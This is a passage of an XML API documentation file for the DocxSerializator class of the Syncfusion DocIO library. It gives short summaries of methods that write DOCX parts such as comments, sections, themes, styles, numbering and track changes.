        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetVerticalOrginAsString(Syncfusion.DocIO.DLS.VerticalOrigin,System.Boolean)">
            <summary>
            Gets the vertical orgin as string.
            </summary>
            <param name="verticalOrigin">The vertical origin.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetWrappingTypeAsString(Syncfusion.DocIO.DLS.TextWrappingType)">
            <summary>
            Get the text wrapping type
            </summary>
            <param name="wrapType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetPictureWrappingTypeAsString(Syncfusion.DocIO.DLS.TextWrappingType)">
            <summary>
            Get the picture's wrapping type.
            </summary>
            <param name="wrapType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeShapeBorders(Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF)">
            <summary>
            Serialize the shape borders.
            </summary>
            <param name="borders"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeShapeBorder(Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode,System.String)">
            <summary>
            Serialize the shape border
            </summary>
            <param name="border"></param>
            <param name="localName"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetShapeBorderStyleAsString(Syncfusion.DocIO.DLS.BorderStyle)">
            <summary>
            Get the shape border style.
            </summary>
            <param name="borderStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeShapePictStyle(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Serialize the shape picture style.
            </summary>
            <param name="picture"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWrapPolygons(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Serializes the wrap polygons.
            </summary>
            <param name="picture">The picture.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeBookmarkEnd(Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Serialize the bookmark end.
            </summary>
            <param name="bookmarkEnd"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeBookmarkStart(Syncfusion.DocIO.DLS.BookmarkStart)">
            <summary>
            Serialize the bookmark start.
            </summary>
            <param name="bookmarkStart"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeBreak(Syncfusion.DocIO.DLS.Break)">
            <summary>
            Serialize the break element.
            </summary>
            <param name="breakType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCommentReference(Syncfusion.DocIO.DLS.WComment)">
            <summary>
            Serialize the comment reference.
            </summary>
            <param name="comment"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.WriteCommItems(Syncfusion.DocIO.DLS.WComment,System.String)">
            <summary>
            Serialize the commented items.
            </summary>
            <param name="comment">The comment.</param>
            <param name="commentId">The comment id.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCommentRangeStart(System.String)">
            <summary>
            Serialize the comment range start.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCommentRangeEnd(System.String)">
            <summary>
            Serialize the comment range end.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeComments">
            <summary>
            Serialize the comments.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeComment(Syncfusion.DocIO.DLS.WComment,System.String)">
            <summary>
            Serialize the comment.
            </summary>
            <param name="comment">The comment.</param>
            <param name="id">The id.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCommentMark(Syncfusion.DocIO.DLS.WCommentMark)">
            <summary>
            Serialize the comment mark.
            </summary>
            <param name="commMark">The comm mark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.CommentIdCheck(System.String)">
            <summary>
            Check for the string content in Comment ID.
            </summary>
            <param name="item">The item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTextRange(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Serialize the text range.
            </summary>
            <param name="item"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeText(System.String,System.Boolean,System.Boolean)">
            <summary>
            Serialize the text.
            </summary>
            <param name="textToDisplay">text</param>
            <param name="isDeletedText">bool to indicate deleted text</param>
            <param name="isInstrText">bool to indicate instr text</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeRawText(System.String,System.Boolean)">
            <summary>
            Serialize the text.
            </summary>
            <param name="text">text</param>
            <param name="isDeletedText">bool to indicate deleted text</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeInstrText(System.String,System.Boolean)">
            <summary>
            Serialize FieldCode text
            </summary>
            <param name="text">Text</param>
            <param name="isDeletedText">bool to indicate deleted text</param> 
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.serializeTableOfContents(Syncfusion.DocIO.DLS.TableOfContent)">
            <summary>
            Serialize the table of contents.
            </summary>
            <param name="toc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetFieldTypeAsString(Syncfusion.DocIO.FieldType)">
            <summary>
            Get the field type as string.
            </summary>
            <param name="type"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSectionProperties(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Serialize the section properties.
            </summary>
            <param name="section"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHFReference(Syncfusion.DocIO.DLS.WHeadersFooters)">
            <summary>
            Serialize the heeader/footer reference.
            </summary>
            <param name="headerFooters">The HeaderFooters</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDocGrid(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Serialize the docGrid element
            </summary>
            <param name="section"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSectionProtection(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Serialize section protection.
            </summary>
            <param name="section"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTextDirection(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Serialize the text direction.
            </summary>
            <param name="section"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeColumns(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Serialize the column properties of section.
            </summary>
            <param name="section"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePageSetup(Syncfusion.DocIO.DLS.WPageSetup)">
            <summary>
            Serialize the page setup properties.
            </summary>
            <param name="pageSetup">The page setup.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePageBorders(Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Serializes the page borders.
            </summary>
            <param name="borders">The borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableCellBorders(Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Serialize the table borders
            </summary>
            <param name="format"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsNoneBorder(Syncfusion.DocIO.DLS.Border)">
            <summary>
            Checks for none border
            </summary>
            <param name="border"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeBorders(Syncfusion.DocIO.DLS.Borders,System.Int32)">
            <summary>
            Serialize the borders.
            </summary>
            <param name="borders"></param>
            <param name="multipler"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePageMargins(Syncfusion.DocIO.DLS.WPageSetup)">
            <summary>
            Serialize the border.
            </summary>
            <param name="pageSetup"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePageSize(Syncfusion.DocIO.DLS.WPageSetup)">
            <summary>
            serialize the page size
            </summary>
            <param name="pageSetup"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePageNumberType(Syncfusion.DocIO.DLS.WPageSetup)">
            <summary>
            Serialize the page number type.
            </summary>
            <param name="pageSetup"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeLineNumberType(Syncfusion.DocIO.DLS.WPageSetup)">
            <summary>
            Serialize the line number type.
            </summary>
            <param name="pageSetup"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSectionType(Syncfusion.DocIO.DLS.SectionBreakCode)">
            <summary>
            Serialize the section type.
            </summary>
            <param name="sectionBreakCode"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetSectionBreakCode(Syncfusion.DocIO.DLS.SectionBreakCode)">
            <summary>
            Serialize the section break code.
            </summary>
            <param name="sectionBreakCode"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeEndnoteProperties(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Serialize the endnote properties.
            </summary>
            <param name="section"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFootnoteProperties(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Serialize the footnote properties.
            </summary>
            <param name="section"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsNeedToSerializeSectionFootNoteProperties(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Determines whether to serialize the section foot note properties or not.
            </summary>
            <param name="section"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsNeedToSerializeSectionEndNoteProperties(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Determines whether to serialize the section end note properties or not.
            </summary>
            <param name="section"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsNeedToSerializeDocumentFootNoteProperties">
            <summary>
            Determines whether to serialize the document foot note properties or not.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsNeedToSerializeDocumentEndNoteProperties">
            <summary>
            Determines whether to serialize the document end note properties or not.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeEndnoteFootnoteElement(System.String,System.String)">
            <summary>
            Serialize the endnote/footnote element properties
            </summary>
            <param name="elemName"></param>
            <param name="elemValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeEndnoteFootnoteNumberFormat(Syncfusion.DocIO.DLS.WSection,System.Boolean)">
            <summary>
            Serializes the endnote footnote number format.
            </summary>
            <param name="section">The section.</param>
            <param name="isFootnote">if set to <c>true</c> [is footnote].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeEndnoteFootnoteNumberFormat(System.Boolean)">
            <summary>
            Serializes the endnote footnote number format.
            </summary>
            <param name="section">The section.</param>
            <param name="isFootnote">if set to <c>true</c> [is footnote].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddHeaderFooter(Syncfusion.DocIO.DLS.HeaderFooter,Syncfusion.DocIO.DLS.HeaderFooterType,System.String)">
            <summary>
            Adds the header footer details to the collection.
            </summary>
            <param name="hf"></param>
            <param name="hfType"></param>
            <param name="id"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeThemes">
            <summary>
            Serialize the document themes. (theme.xml)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFillStyleList(System.Collections.Generic.List{Syncfusion.DocIO.DLS.FillFormat})">
            <summary>
            Serialize Fill Styles (Both Fill and Background Fill effects of Themes)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeThemePattern(Syncfusion.DocIO.DLS.FillFormat)">
            <summary>
            Serialize Theme Pattern
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeThemeLinePattern(Syncfusion.DocIO.DLS.LineFormat)">
            <summary>
            Serialize Theme Pattern
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeThemeSolidFill(Syncfusion.DocIO.DLS.FillFormat)">
            <summary>
            Serialize Theme Pattern
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeThemeGradient(Syncfusion.DocIO.DLS.GradientFill)">
            <summary>
            Serialize Theme Pattern
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeThemeGradientStop(Syncfusion.DocIO.DLS.GradientStop)">
            <summary>
            Serializes the gradient stop.
            </summary>
            <param name="gradientStop">The gradient stop.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeEffectStyles(Syncfusion.DocIO.DLS.EffectFormat)">
            <summary>
            Serialize Effect Styles of themes
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeLineStyleList(Syncfusion.DocIO.DLS.LineFormat)">
            <summary>
            Serializes Line Style List
            </summary>
            <param name="gradientStop">The gradient stop.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultThemes">
            <summary>
            Serializes the default themes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultColorScheme(System.Boolean)">
            <summary>
            Serializes the default color scheme.
            </summary>
            <param name="isWord2013">if set to <c>true</c> [is word2013].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeRGBColor(System.String,System.String)">
            <summary>
            Serializes the RGB color
            </summary>
            <param name="colorValue">color value</param>
            <param name="alphaColorValue">Alpha color value</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultFontScheme(System.Boolean)">
            <summary>
            Serializes the default font scheme.
            </summary>
            <param name="isWord2013">if set to <c>true</c> [is word2013].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultFormatScheme(System.Boolean)">
            <summary>
            Serializes the default format scheme.
            </summary>
            <param name="isWord2013">if set to <c>true</c> [is word2013].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultFillStyleList(System.Boolean)">
            <summary>
            Serializes the default fill style list.
            </summary>
            <param name="isWord2013">if set to <c>true</c> [is word2013].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultLineStyleList(System.Boolean)">
            <summary>
            Serializes the default line style list.
            </summary>
            <param name="isWord2013">if set to <c>true</c> [is word2013].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultLineStyle(System.String,System.String,System.String,System.String,System.Boolean)">
            <summary>
            Serializes the default line style.
            </summary>
            <param name="width">The width.</param>
            <param name="lineCap">The line cap.</param>
            <param name="lineType">Type of the line.</param>
            <param name="alignment">The alignment.</param>
            <param name="isMiter">if set to <c>true</c> [is miter].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultEffectStyleList(System.Boolean)">
            <summary>
            Serializes the default effect style list.
            </summary>
            <param name="isWord2013">if set to <c>true</c> [is word2013].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeEffectStyle(System.String,System.String,System.String,System.Boolean)">
            <summary>
            Serializes the effect style.
            </summary>
            <param name="blurRadius">The blur radius.</param>
            <param name="distance">The distance.</param>
            <param name="alpha">The alpha.</param>
            <param name="isAlign">if set to <c>true</c> [is align].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultBackgroundFillStyleList(System.Boolean)">
            <summary>
            Serializes the default background fill style list.
            </summary>
            <param name="isWord2013">if set to <c>true</c> [is word2013].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultBackgroundFillStyleList">
            <summary>
            Serializes the default background fill style list for Word version 2007 and 2010.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSchemeColor(System.String)">
            <summary>
            Serializes the color of the scheme.
            </summary>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeGradientRelativePositions(System.String,System.String,System.String,System.String)">
            <summary>
            Serializes the default gradient relative position attributes
            </summary>
            <param name="lumMod">Luminance modulation value</param>
            <param name="satMod">Saturation modulation value</param>
            <param name="tint">Tint value</param>
            <param name="shade">Shading value</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultThemeFont(System.String,System.Boolean)">
            <summary>
            Serializes the default theme font.
            </summary>
            <param name="fontType">Type of the font.</param>
            <param name="isWord2013">if set to <c>true</c> [is word2013].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSettings">
            <summary>
            Serialize the document settings. (settings.xml)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSettingsRelation">
            <summary>
            Serializes the setting relations
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ParseSettingsRelations">
            <summary>
            Parses the settings relations.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDocxProps(System.Collections.Generic.List{System.IO.Stream},System.String)">
            <summary>
            Serializes the Docx unhandled properties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDocxProps(System.Collections.Generic.Dictionary{System.String,System.IO.Stream},System.String)">
            <summary>
            Serializes the Docx unhandled properties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCompatibilityProperties">
            <summary>
            Serializes the compatibility properties to maintain backward compatibility similar to input document, 
            when file is opened in lower version applications.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCommonCompatibilityOptions">
            <summary>
            Serializes the Docx Common compatibility Layout options for all version.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCompatSettings">
            <summary>
            Serializes the compatibility settings
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeProtect(Syncfusion.DocIO.ProtectionType)">
            <summary>
            Serializes the document protection type.
            </summary>
            <param name="protectionType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDocVariables(Syncfusion.DocIO.DLS.DocVariables)">
            <summary>
            Serialize the document variables.
            </summary>
            <param name="docVariables"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFootnoteSettings">
            <summary>
            Serializes the Footnote/Endnote settings
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFootnotePosition">
            <summary>
            Serializes the Footnote position
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.WriteEntPosition">
            <summary>
            Serialize the Endnote position
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFootnotePosition(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Serializes the Footnote position
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.WriteFootEndnoteID(System.Boolean,System.Int32)">
            <summary>
            Serializes the Footnote/Endnote ID
            </summary>
            <param name="isFootnote"></param>
            <param name="id"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeNumberings">
            <summary>
            Serialize the list styles and numberings (numberings.xml)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeListOverrides(Syncfusion.DocIO.DLS.ListOverrideStyleCollection)">
            <summary>
            Serializes the Override styles
            </summary>
            <param name="listOverrideStyles">Collection of ListOverride style</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeOverrideStyle(Syncfusion.DocIO.DLS.ListOverrideStyle)">
            <summary>
            Serializes the Override styles
            </summary>
            <param name="listOverrideStyle">List Override style</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeOverrideLevel(System.Int32,Syncfusion.DocIO.DLS.OverrideLevelFormat)">
            <summary>
            Serializes the level overrides
            </summary>
            <param name="levelIndex">The level Index</param>
            <param name="level">Override level</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeListInstances(Syncfusion.DocIO.DLS.ListStyleCollection)">
            <summary>
            Serializes the list styles
            </summary>
            <param name="listStyles">Collection of list styles</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeAbstractListStyles(Syncfusion.DocIO.DLS.ListStyleCollection)">
            <summary>
            Serializes the abstract list styles
            </summary>
            <param name="listStyles">Collecgtion of list styles</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeListLevel(Syncfusion.DocIO.DLS.WListLevel,System.Int32)">
            <summary>
            Serialize the list level
            </summary>
            <param name="listLevel">The List level</param>
            <param name="levelIndex">The level index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeLegacyProperties(Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Serialize the list level legacy properties.
            </summary>
            <param name="listLevel">The list level.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeLevelFollow(Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Serialize the level follow character
            </summary>
            <param name="listLevel">The list level</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.RemoveIllegalXMLCharacters(System.String)">
            <summary>
            To Remove xml ilegal character Ascii 0-29 from text.
            </summary>
            <param name="listLevel">The text.</param>        
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeLevelText(Syncfusion.DocIO.DLS.WListLevel,System.Int32)">
            <summary>
            Serializes the level text
            </summary>
            <param name="listLevel">The list level</param>
            <param name="lvlIndex">The level index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePictureBullets(Syncfusion.DocIO.DLS.ListStyleCollection)">
            <summary>
            Serializes the picture bullets.
            </summary>
            <param name="listStyleCollection">Collection of list styles</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePictureBullet(Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Serializes the picture bullet.
            </summary>
            <param name="listLevel">The list level</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeStyles">
            <summary>
            Serialize the styles (styles.xml)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDocumentStyles">
            <summary>
            Serializes the document styles
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeStyle(Syncfusion.DocIO.DLS.Style,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Serialize the document style
            </summary>
            <param name="style">The Style</param>
            <param name="document">Instance of the word document</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableStyle(Syncfusion.DocIO.DLS.WTableStyle)">
            <summary>
            Serialize the table style
            </summary>
            <param name="style">The Style</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeConditionalFormattingStyle(Syncfusion.DocIO.DLS.ConditionalFormattingCode,Syncfusion.DocIO.DLS.ConditionalFormattingStyle)">
            <summary>
            Serialize the table conditional formatting style
            </summary>
            <param name="code">The Code</param>
            <param name="style">The Style</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetConditionalStyleType(Syncfusion.DocIO.DLS.ConditionalFormattingCode)">
            <summary>
            Gets conditional formatting style type
            </summary>
            <param name="code">The Code</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableStyleCellProperties(Syncfusion.DocIO.DLS.TableStyleCellProperties)">
            <summary>
            Serialize the table style cell properties
            </summary>
            <param name="props">The Props</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableStyleRowProperties(Syncfusion.DocIO.DLS.TableStyleRowProperties)">
            <summary>
            Serialize the table style row properties
            </summary>
            <param name="props">The Props</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableStyleTableProperties(Syncfusion.DocIO.DLS.TableStyleTableProperties)">
            <summary>
            Serialize the table style table properties
            </summary>
            <param name="props">The Props</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeShading(Syncfusion.DocIO.DLS.TableStyleCellProperties)">
            <summary>
            Serialize the shading element in cell properties.
            </summary>
            <param name="cell">The table cell</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeShading(Syncfusion.DocIO.DLS.TableStyleTableProperties)">
            <summary>
            Serialize the shading element in table properties.
            </summary>
            <param name="props">The props</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeLatentStyles">
            <summary>
            Serializes the latent styles
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultStyles">
            <summary>
            Serializes the default styles (document default paragraph and character format)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableGridStyle">
            <summary>
            Serializes the TableGrid style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeNoListStyle">
            <summary>
            Serializes "NoList" style
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableNormalStyle">
            <summary>
            Serializes the "TableNormal" style
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDefaultParagraphStyle">
            <summary>
            Serializes the default paragraph style
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCharactetFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Serializes the Character format
            </summary>
            <param name="characterFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeLigatures(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Serializes the ligatures.
            </summary>
            <param name="characterFormat">The character format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeNumberForm(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Serializes the number form.
            </summary>
            <param name="characterFormat">The character format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeNumberSpacing(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Serializes the number spacing.
            </summary>
            <param name="characterFormat">The character format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeStylisticSet(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Serializes the stylistic set.
            </summary>
            <param name="characterFormat">The character format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeContextualAlternates(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Serializes the contextual alternates.
            </summary>
            <param name="characterFormat">The character format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCharacterShading(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Serialize character shading
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeParagraphFormat(Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Serializes the paragraph format
            </summary>
            <param name="paragraphFormat"></param>
            <param name="paragraph"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeMirrorIndents(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Serializes the mirror indents.
            </summary>
            <param name="paragraphFormat">The paragraph format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSuppressAutoHyphens(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Serializes the suppress automatic hyphens.
            </summary>
            <param name="paragraphFormat">The paragraph format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetNextTChangeId">
            <summary>
            Gets the next track change id.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTrackChange(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Serializes the track change.
            </summary>
            <param name="item">The item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTrackChangeProps(System.String)">
            <summary>
            Serializes the track changes property
            </summary>
            <param name="type"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeChangeFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Serializes the row change format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeParagraphAlignment(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Serializes the paragraph alignment
            </summary>
            <param name="paragraphFormat">The paragraph format</param>
        </member>
